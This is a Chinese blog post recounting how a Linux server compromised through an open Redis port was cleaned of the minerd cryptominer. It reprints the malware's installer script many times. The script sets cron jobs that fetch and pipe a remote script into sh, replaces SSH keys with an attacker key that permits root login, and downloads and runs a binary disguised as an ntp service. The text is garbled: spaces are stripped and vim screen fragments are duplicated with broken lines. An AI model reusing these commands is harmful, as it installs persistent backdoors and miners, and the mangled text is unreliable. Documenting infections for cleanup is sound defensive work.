linux中了minerd之后的完全清理过程(详解)

2024-03-07 06:58:03 292

一不小心装了一个Redis服务，开了一个全网的默认端口，一开始以为这台服务器没有公网ip，结果发现之后悔之莫及啊

某天发现cpuload高的出奇，发现一个minerd进程占了大量cpu，google了一下，发现自己中招了

下面就是清理过程

第一步

1.立即停止redis服务，修改端口权限，增加密码措施

2.按照网上的资料删除crontab里的两个内容

sudorm/var/spool/cron/root
sudorm/var/spool/cron/crontabs/root

3.知己知彼，百战不殆，研究病毒的初始话文件

exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
"pm.sh"28L,1470C10,1-8顶端
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spooll
/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spooll
/cron/crontabs/root

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITT
shREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZZ
7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kvv
9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1yy
993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK755
NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
10,1-8顶端
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/rr
oot
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/cc
rontabs/root

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOcc
9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLL
Kn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm88
gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBrr
o4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi

if[!-f"/etc/init.d/ntp"];then
10,1-8顶端
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/roo
ot

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yWW
8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQQ
V8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXX
mVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot""
>~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi

if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
@
10,1-8顶端
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/AA
g1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txLL
6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNyy
tbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi

if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK77
5NEOiq33&&/opt/KHK75NEOiq33-Install
fi
fi

10,1-8顶端
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TT
dRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6ww
L4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdd
Y7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi

if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opp
t/KHK75NEOiq33-Install
fi
fi

/etc/init.d/ntpstart

psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9
10,1-8顶端
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYY
pLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbb
BXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi

if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Instaa
ll
fi
fi

/etc/init.d/ntpstart

psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9
psauxf|grep-vgrep|grep"/opt/cron"|awk'{print$2}'|xargskill-9
~
~
~
~
~
10,1-8全部
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77
yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999
3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi

if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Install
fi
fi

/etc/init.d/ntpstart

psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9
psauxf|grep-vgrep|grep"/opt/cron"|awk'{print$2}'|xargskill-9

得到结果

1.删除crontab的配置文件，如上我们已经删除，涉及的代码

echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root

2.删除这个是用来免密码登陆的

rm-f~/.ssh/authorized_keys*
rm-f~/.ssh/KHK75NEOiq

你甚至可以直接把.ssh这个目录删除掉
涉及的代码

if[!-f"/root/.ssh/KHK75NEOiq"];then
mkdir-p~/.ssh
rm-f~/.ssh/authorized_keys*
echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77
yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999
3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq
echo"PermitRootLoginyes">>/etc/ssh/sshd_config
echo"RSAAuthenticationyes">>/etc/ssh/sshd_config
echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config
echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config
/etc/init.d/sshdrestart
fi

3.删除/opt/这个目录这玩意是第四步的服务产生的

4.删除服务

servicentpstop
rm/etc/init.d/ntp
rm/usr/sbin/ntp
涉及的代码

if[!-f"/etc/init.d/ntp"];then
if[!-f"/etc/systemd/system/ntp.service"];then
mkdir-p/opt
curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Install
fi
fi

如上的代码，下载了一个8M的程序，是安装了什么东西，楼主也不知道，但是接下来的代码暴露了行踪

/etc/init.d/ntpstart

这行代码启动了ntp这个服务，百度搜了下说是个时间服务，其实这玩意是病毒服务，打开这个文件，找到可执行文件/usr/sbin/ntp发现文件和那个8m的文件一个字节不差

所以删除这个文件

最后

psaux|grepminerd

kill掉所有的进程，ok修复结束

半小时之后

psaux|grepminerd

minerd进程不再出现

以上就是小编为大家带来的linux中了minerd之后的完全清理过程(详解)全部内容了，希望大家多多支持毛票票~

linux中了minerd之后的完全清理过程(详解)

热门推荐

随机推荐